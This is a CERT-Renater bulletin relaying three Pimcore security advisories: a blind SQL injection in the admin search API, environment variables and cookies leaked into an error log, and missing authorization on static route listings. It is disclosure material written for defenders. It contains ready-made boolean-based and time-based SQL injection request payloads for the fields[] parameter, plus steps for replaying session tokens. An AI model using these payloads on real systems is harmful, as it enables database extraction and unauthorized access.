Ce mail provient de l'extérieur, restons vigilants

=====================================================================

                            CERT-Renater

                Note d'Information No. 2026/VULN046
_____________________________________________________________________

DATE                : 16/01/2026

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running pimcore (Composer) versions prior
                                   to 12.3.1 11.5.14.

=====================================================================
https://github.com/pimcore/pimcore/security/advisories/GHSA-qvr7-7g55-69xj
https://github.com/pimcore/pimcore/security/advisories/GHSA-q433-j342-rp9h
https://github.com/pimcore/pimcore/security/advisories/GHSA-m3r2-724c-pwgf
_____________________________________________________________________

(Incomplete Patch )[Blind SQL Injection] in Admin Search Find API
High
astapc published GHSA-qvr7-7g55-69xj Jan 14, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 <= 11.5.13

Patched versions
12.3.1 11.5.14


Description

Summary

An incomplete SQL injection patch in the Admin Search Find API allows 
an authenticated attacker to perform blind SQL injection.
Although CVE-2023-30848 attempted to mitigate SQL injection by 
removing SQL comments (--) and catching syntax errors, the fix is 
insufficient. Attackers can still inject SQL payloads that do not rely 
on comments and infer database information via blind techniques. This 
vulnerability affects the admin interface and can lead to database 
information disclosure.


Details

The vulnerability exists in the Admin Search Find API endpoint:

/admin/search/search/find

In CVE-2023-30848, the following patch was applied:

    SQL comments are removed by replacing --
    SQL syntax errors are caught and replaced with a generic exception

Relevant commit:
25ad867

Key changes include:

// remove sql comments
$fields = str_replace('--', '', $fields);

try {
    $hits = $searcherList->load();
} catch (SyntaxErrorException $syntaxErrorException) {
    throw new \InvalidArgumentException('Check your arguments.');
}

However, this mitigation is incomplete for the following reasons:

1. Only -- is filtered

SQL injection does not require SQL comments. Payloads using boolean 
conditions, SQL functions, or time-based expressions remain effective.

2. Exception handling only suppresses error output

While syntax errors no longer produce detailed error messages, the 
underlying SQL query is still executed. This allows attackers to 
perform blind SQL injection.

3. User-controlled input is still used in SQL query construction
The fields[] parameter is attacker-controlled and can be abused to 
inject SQL expressions into the generated query.

As a result, attackers can craft payloads that do not trigger syntax 
errors and still influence SQL execution.


PoC

The following request demonstrates a blind SQL injection via the 
fields[] parameter.

Boolean-based Blind Injection

GET /admin/search/search/find?query=2&
fields[]=field1 AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 
END)=1~field2&
filter=[{"property":"value"}]&
class=classname

Time-based Blind Injection

GET /admin/search/search/find?query=2&
fields[]=field1 AND IF(1=1,SLEEP(5),0)~field2&
filter=[{"property":"value"}]&
class=classname

Observed behavior:

    When the condition is true, the response is delayed (e.g., ~5 
seconds)

    When the condition is false, the response is returned immediately

This confirms that injected SQL expressions are executed successfully.


Impact

This is a Blind SQL Injection vulnerability.

    Affected users: Systems exposing the Admin Search Find API to 
authenticated users

    Attack requirements: Authenticated access to the admin interface

    Potential impact:

        Database schema enumeration

        Extraction of sensitive data via blind SQL injection

        Potential full database compromise depending on database 
privileges

This issue demonstrates that the fix for CVE-2023-30848 is incomplete.


Severity
High

CVE ID
CVE-2026-23492

Weaknesses
Weakness CWE-89

Credits

    @Snow1nd Snow1nd Reporter

_____________________________________________________________________

ENV Variables and Cookie Informations exposed in http_error_log
High
astapc published GHSA-q433-j342-rp9h Jan 15, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 <= 11.5.13

Patched versions
12.3.1 11.5.14


Description

Summary

The http_error_log file stores the $_COOKIE and $_SERVER variables,
which means sensitive information such as database passwords, cookie
session data, and other details can be accessed or recovered through
the Pimcore backend.


Details

It’s better to remove both lines, as this information makes little
sense in this context anyway.

https://github.com/pimcore/pimcore/blob/12.x/bundles/SeoBundle/src/EventListener/ResponseExceptionListener.php#L92
https://github.com/pimcore/pimcore/blob/12.x/bundles/SeoBundle/src/EventListener/ResponseExceptionListener.php#L93


PoC

In the Pimcore backend, navigate to "Search Engine Optimization" and
click on "HTTP Errors." Double-click on an entry to view its details.
Here, you may find sensitive data exposed.


Impact

Pimcore backend users can access sensitive environment variables,
potentially exposing critical information.

Severity
High
8.6/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
Low
Availability
Low
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L

CVE ID
CVE-2026-23493

Weaknesses
No CWEs


Credits

    @putzflorian putzflorian Reporter
_____________________________________________________________________

Broken Access Control: Missing Function Level Authorization on
"Static Routes" Listing

Moderate
astapc published GHSA-m3r2-724c-pwgf Jan 15, 2026

Package
pimcore/pimcore (Composer)

Affected versions
<= 12.3 <= 11.5.13

Patched versions
12.3.1 11.5.14


Description

Summary

The application fails to enforce proper server-side authorization
checks on the API endpoint responsible for reading or listing static
routes. In Pimcore, static routes are custom URL patterns defined via
the backend interface or the var/config/staticroutes.php file,
including details like regex-based patterns, controllers, variables,
and priorities. These routes are registered automatically through the
PimcoreStaticRoutesBundle and integrated into the MVC routing system.
Testing revealed that an authenticated backend user lacking explicit
permissions was able to invoke the endpoint
(e.g., GET /api/static-routes) and retrieve sensitive route
configurations. This violates OWASP A01:2021 Broken Access Control,
as function-level authorization is absent, allowing unauthorized
access to internal routing metadata. Without validation, the
endpoint exposes route structures, potentially revealing application
architecture, endpoints, or custom logic intended for administrative
roles only.


Details

The backend user without permission was still able to list
"Static Routes" item
Step to Reproduce the issue

login as Admin (full permission) and clicked "Static Routes"
Screenshot 2025-12-10 at 9 36 04 PM
Then, captured and saved the request:
-List API
Screenshot 2025-12-10 at 9 44 17 PM

Next, login a backend user with no permission
Screenshot 2025-12-10 at 9 06 12 PM

The copy the "Cookie" and "X-Pimcore-Csrf-Token"
Screenshot 2025-12-10 at 9 10 47 PM

After that, pasted the copied "Cookie" and "X-Pimcore-Csrf-Token" to
captured request

-List API
Screenshot 2025-12-10 at 9 47 27 PM


Impact

Exploitation enables low-privileged users to enumerate static routes,
gaining reconnaissance into URL patterns, associated controllers,
and parameter handling, which could facilitate targeted attacks like
path traversal, injection via exposed variables, or discovery of
hidden administrative paths. In a Pimcore environment, this might
expose site-specific routing for multi-tenant setups, leading to
unauthorized data access, workflow manipulation, or escalation to
broader system compromise. Business impacts include intellectual
property leakage of custom routing logic, regulatory
non-compliance (e.g., GDPR for exposed configs), and increased
attack surface for chaining with other vulnerabilities.


Severity
Moderate
4.3/ 10

CVSS v3 base metrics
Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

CVE ID
CVE-2026-23494

Weaknesses
Weakness CWE-284

Credits

    @ytlamal ytlamal Finder


=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================